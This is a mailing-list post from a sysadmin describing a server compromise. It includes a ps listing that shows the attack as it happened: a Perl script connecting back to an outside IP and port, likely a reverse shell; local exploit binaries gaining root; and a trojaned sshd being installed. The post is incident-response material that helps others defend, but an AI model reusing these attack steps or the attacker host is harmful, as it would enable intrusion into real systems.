My machine was hacked - possibly via sshd?
This morning my machine was also compromised, in a fashion similar to the one
described in your post here.
http://lists.debian.org/debian-security/2005/03/msg00112.html
Was the point of entry ever determined?
I happened to log onto my machine while this was taking place. I ran ps,
killed all non-essential processes, mounted a directory tree I had with
known-good binaries, and used those to poke around the machine.
I have no idea how they got in; there were a lot of processes running as
nobody. I really only run apache as nobody, so that could be the point of
entry. (In the listing below, the nobody-owned shells appear before the
root-owned processes that install a replacement /usr/sbin/sshd, which
suggests sshd was swapped out after the compromise rather than being the
way in.)
I will include the ps listing in this email. I would at least like to know
the name of the rootkit, if anyone has that info. I also saved all the
binaries and have a tripwire report of the changed files.
Thanks
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Jan10 ? 00:00:24 init
root 2 1 0 Jan10 ? 00:00:00 [keventd]
root 3 0 0 Jan10 ? 00:00:01 [ksoftirqd_CPU0]
root 4 0 0 Jan10 ? 00:00:01 [ksoftirqd_CPU1]
root 5 0 0 Jan10 ? 00:52:23 [kswapd]
root 6 0 0 Jan10 ? 00:23:30 [kreclaimd]
root 7 0 0 Jan10 ? 00:06:15 [bdflush]
root 8 0 0 Jan10 ? 00:00:59 [kupdated]
root 9 1 0 Jan10 ? 00:00:00 [mdrecoveryd]
root 17 1 0 Jan10 ? 00:20:19 [kjournald]
root 92 1 0 Jan10 ? 00:00:00 [khubd]
root 185 1 0 Jan10 ? 00:00:00 [kjournald]
root 955 1 0 Jan10 ? 00:00:11 /usr/local/apache/bin/httpd
root 1294 1 0 Jan10 ? 00:00:00 [scsi_eh_2]
root 1335 1 0 Jan10 ? 00:00:04 crond
xfs 1407 1 0 Jan10 ? 00:00:00 xfs -droppriv -daemon
root 1471 1 0 Jan10 ? 00:00:00 /usr/local/snmp/sbin/snmpd
root 1504 1 0 Jan10 tty1 00:00:00 /sbin/mingetty tty1
root 1505 1 0 Jan10 tty2 00:00:00 /sbin/mingetty tty2
root 1506 1 0 Jan10 tty3 00:00:00 /sbin/mingetty tty3
root 1507 1 0 Jan10 tty4 00:00:00 /sbin/mingetty tty4
root 1508 1 0 Jan10 tty5 00:00:00 /sbin/mingetty tty5
root 1509 1 0 Jan10 tty6 00:00:00 /sbin/mingetty tty6
root 1896 1 0 Jan10 ? 00:23:49 /usr/local/sbin/named
root 18348 1 0 Jan10 ? 00:00:00 /usr/local/apache-https/bin/http
root 20871 1 0 Jan14 ? 00:00:00 /bin/sh /usr/local/mysql/bin/saf
mysql 20899 20871 0 Jan14 ? 00:08:03 /usr/local/mysql/libexec/mysqld
mysql 20901 20899 0 Jan14 ? 00:08:03 /usr/local/mysql/libexec/mysqld
mysql 20902 20901 0 Jan14 ? 00:09:27 /usr/local/mysql/libexec/mysqld
ntp 23268 1 0 May18 ? 00:00:01 ntpd -U ntp
root 5487 1 0 Jun20 ? 00:00:09 xinetd -stayalive -reuse -pidfil
root 25030 1 0 Jun25 ? 00:00:20 /usr/local/bin/perl /usr/local/p
nobody 6057 18348 0 Jul11 ? 00:00:07 /usr/local/apache-https/bin/http
nobody 6058 18348 0 Jul11 ? 00:00:10 /usr/local/apache-https/bin/http
nobody 6059 18348 0 Jul11 ? 00:00:09 /usr/local/apache-https/bin/http
nobody 6060 18348 0 Jul11 ? 00:00:09 /usr/local/apache-https/bin/http
nobody 6061 18348 0 Jul11 ? 00:00:07 /usr/local/apache-https/bin/http
nobody 6063 18348 0 Jul11 ? 00:00:09 /usr/local/apache-https/bin/http
nobody 6068 18348 0 Jul11 ? 00:00:08 /usr/local/apache-https/bin/http
bates 24856 1 0 Jul11 ? 00:00:01 ./server_linux -PID=tsserver2.pi
bates 24857 24856 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
bates 24858 24857 0 Jul11 ? 00:00:01 ./server_linux -PID=tsserver2.pi
bates 24859 24857 0 Jul11 ? 00:00:01 ./server_linux -PID=tsserver2.pi
bates 24860 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
bates 24861 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
bates 24862 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
bates 24863 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
bates 24864 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
smmsp 23861 1 0 Jul15 ? 00:00:00 sendmail: Queue runner@00:05:00
root 23878 1 0 Jul15 ? 00:00:05 sendmail: accepting connections
root 16095 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio
root 16096 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio
root 16097 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio
root 16098 955 0 Jul18 ? 00:00:09 /usr/local/sbin/cronolog --perio
root 16099 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio
root 16100 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio
nobody 16101 955 0 Jul18 ? 00:07:18 /usr/local/apache/bin/httpd
nobody 16102 955 0 Jul18 ? 00:07:01 /usr/local/apache/bin/httpd
nobody 16103 955 0 Jul18 ? 00:07:16 /usr/local/apache/bin/httpd
nobody 16104 955 0 Jul18 ? 00:07:12 /usr/local/apache/bin/httpd
nobody 16105 955 0 Jul18 ? 00:07:23 /usr/local/apache/bin/httpd
nobody 16107 955 0 Jul18 ? 00:06:58 /usr/local/apache/bin/httpd
nobody 16109 955 0 Jul18 ? 00:07:31 /usr/local/apache/bin/httpd
nobody 16110 955 0 Jul18 ? 00:07:42 /usr/local/apache/bin/httpd
nobody 16114 955 0 Jul18 ? 00:07:21 /usr/local/apache/bin/httpd
nobody 16116 955 0 Jul18 ? 00:07:05 /usr/local/apache/bin/httpd
root 371 1 0 03:31 ? 00:00:06 /usr/local/bin/spamd -d -c -a -m
root 3665 1 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3692 3665 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3693 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3694 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3695 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3696 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3697 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3698 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3699 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3700 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3701 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3702 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3703 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3704 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3705 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3706 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3707 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3708 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3709 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3710 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3711 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3712 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3713 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3714 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3715 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3716 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3717 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3718 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3719 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3720 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3721 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3722 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3723 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3724 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 4471 23878 0 06:29 ? 00:00:00 sendmail: ./j6GIV8U9014887 mx00.
nobody 4742 1 0 06:39 ? 00:00:00 sh -c echo ;echo b_exp;cd /tmp;r
nobody 4745 4742 0 06:39 ? 00:00:00 perl clean 220.228.110.11 2025
nobody 4747 4745 0 06:39 ? 00:00:00 sh -c echo "`uname -a`";echo "`i
nobody 4752 4747 0 06:39 ? 00:00:00 /bin/sh
nobody 4824 4752 0 06:40 ? 00:00:00 ./ptr3
nobody 4825 4824 0 06:40 ? 00:00:00 [ptr3 <defunct>]
nobody 4826 4824 0 06:40 ? 00:00:00 [ptr3 <defunct>]
root 4827 4824 0 06:40 ? 00:00:00 [modprobe <defunct>]
root 4829 4824 0 06:40 ? 00:00:00 /bin/sh
root 4831 1 0 06:40 ? 00:00:00 ./ptr3
root 4858 4829 0 06:41 ? 00:00:00 /bin/sh ./make
root 4863 4858 0 06:41 ? 00:00:00 ./inst
root 4866 1 0 06:41 ? 00:00:00 chmod 777 conf configure inst li
root 4867 4863 0 06:41 ? 00:00:00 /bin/bash ./configure
root 4870 4866 0 06:41 ? 00:00:00 [chmod <defunct>]
root 4920 1 0 06:41 ? 00:00:00 chmod 755 /usr/local/bin/ssh2
root 4925 4920 0 06:41 ? 00:00:00 [chmod <defunct>]
root 4927 1 0 06:41 ? 00:00:00 mv -f sshd /usr/sbin/sshd
root 4929 1 0 06:41 ? 00:00:00 chown root.bin /usr/sbin/sshd
root 4932 4929 0 06:41 ? 00:00:00 [chown <defunct>]
root 4933 4927 0 06:41 ? 00:00:00 [mv <defunct>]
root 4940 1 0 06:41 ? 00:00:00 chown root.bin /usr/local/sbin/s
root 4950 4940 0 06:41 ? 00:00:00 [chown <defunct>]
root 4958 1 0 06:41 ? 00:00:00 hostname -f
root 4960 4958 0 06:41 ? 00:00:00 [hostname <defunct>]
nobody 4964 1 0 06:42 ? 00:00:00 sh -c echo ;echo b_exp;cd /tmp;r
nobody 4967 4964 0 06:42 ? 00:00:00 perl clean 220.228.110.11 2025
nobody 4968 4967 0 06:42 ? 00:00:00 sh -c echo "`uname -a`";echo "`i
nobody 4973 4968 0 06:42 ? 00:00:00 /bin/sh
nobody 4985 4973 0 06:42 ? 00:00:01
nobody 4996 1 0 06:42 ? 00:00:00 sh -c echo ;echo b_exp;cd /tmp;r
nobody 4999 4996 0 06:42 ? 00:00:00 perl clean 220.228.110.11 2025
nobody 5000 4999 0 06:43 ? 00:00:00 sh -c echo "`uname -a`";echo "`i
nobody 5005 5000 0 06:43 ? 00:00:00 /bin/sh
nobody 5030 5005 0 06:43 ? 00:00:00 ./traci
nobody 5031 5030 0 06:43 ? 00:00:00 ./traci
nobody 5032 5030 0 06:43 ? 00:00:00 [traci <defunct>]
root 5033 5030 0 06:43 ? 00:00:00 [modprobe <defunct>]
root 5034 5030 0 06:43 ? 00:00:00 /bin/sh
root 5035 5034 0 06:43 ? 00:00:00 ./traci
root 5055 23878 0 06:43 ? 00:00:00 sendmail: j6KDhuqh005055 e176012
root 5105 1 0 06:44 ? 00:00:00 minilogd
root 5233 1 0 06:46 ? 00:00:00 sendmail: accepting connections
root 5260 1 0 06:46 ? 00:00:00 sshd: bates [priv]
bates 5264 5260 0 06:46 ? 00:00:00 sshd: bates@pts/2
bates 5266 5264 0 06:46 pts/2 00:00:00 -bash
root 5423 5266 0 06:47 pts/2 00:00:00 bash
root 5562 1 0 06:49 ? 00:00:00 /usr/local/sbin/sshd
root 6465 5423 46 06:51 pts/2 00:01:55 tripwire
root 6965 5562 0 06:52 ? 00:00:00 sshd: bates [priv]
bates 6968 6965 0 06:52 ? 00:00:00 sshd: bates@pts/3
bates 6969 6968 0 06:52 pts/3 00:00:00 -bash
root 7061 6969 0 06:53 pts/3 00:00:00 bash
mysql 7343 20901 0 06:55 ? 00:00:00 /usr/local/mysql/libexec/mysqld
root 7344 7061 0 06:55 pts/3 00:00:00 ps -ef